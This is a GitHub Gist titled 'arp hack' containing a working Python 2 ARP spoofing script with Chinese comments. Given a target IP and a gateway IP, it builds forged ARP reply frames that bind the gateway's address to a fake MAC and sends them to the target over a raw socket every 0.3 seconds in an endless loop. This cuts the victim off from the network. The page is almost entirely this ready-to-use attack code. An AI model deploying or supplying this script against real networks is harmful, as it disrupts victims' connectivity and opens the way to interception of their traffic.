Created
February 23, 2016 05:27
-
-
Save ls0f/a7297554dad4afd8b2d5 to your computer and use it in GitHub Desktop.
arp hack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding:utf-8 | |
import socket | |
import time | |
import os | |
import sys | |
from struct import pack | |
ARPOP_REQUEST = pack('!H', 0x0001) | |
ARPOP_REPLY = pack('!H', 0x0002) | |
ETHERNET_PROTOCOL_TYPE_ARP = pack('!H', 0x0806) | |
ARP_PROTOCOL_TYPE_ETHERNET_IP = pack('!HHBB', 0x0001, 0x0800, 0x0006, 0x0004) | |
def get_ip_mac(ip): | |
cmd = "arp -n %s |tail -n 1 |awk '{print $3}' " % (ip,) | |
return os.popen(cmd).read().strip() | |
def hack(hack_ip, gate_way_ip): | |
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0806)) | |
sock.bind(("p3p1", socket.SOCK_RAW)) | |
# sock.bind(("en0", socket.SOCK_RAW)) | |
# 模拟网关发出arp应答 | |
sender_ip = pack('!4B', *[int(x) for x in gate_way_ip.split('.')]) | |
target_ip = pack('!4B', *[int(x) for x in hack_ip.split('.')]) | |
sender_mac = pack('!6B', *(0x11,)*6)#伪造的mac地址 | |
target_mac = pack('!6B', *(int(item, 16) for item in get_ip_mac(hack_ip).split(":"))) | |
count = 0 | |
arpframe = [ | |
# ## ETHERNET | |
# destination MAC addr | |
target_mac, | |
# source MAC addr | |
sender_mac, | |
ETHERNET_PROTOCOL_TYPE_ARP, | |
# ## ARP | |
ARP_PROTOCOL_TYPE_ETHERNET_IP, | |
# operation type | |
ARPOP_REPLY, | |
# sender MAC addr | |
sender_mac, | |
# sender IP addr | |
sender_ip, | |
# target hardware addr | |
target_mac, | |
# target IP addr | |
target_ip, | |
] | |
# send the ARP | |
while 1: | |
sock.send(''.join(arpframe)) | |
count += 1 | |
sys.stdout.write("\r 发送了{}个arp包".format(count)) | |
time.sleep(0.3) | |
if __name__ == '__main__': | |
try: | |
hack_ip = sys.argv[1] | |
gate_way_ip = sys.argv[2] | |
except IndexError: | |
print "arp.py <hack_ip> <gate_way_ip>" | |
sys.exit(1) | |
hack(hack_ip, gate_way_ip) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment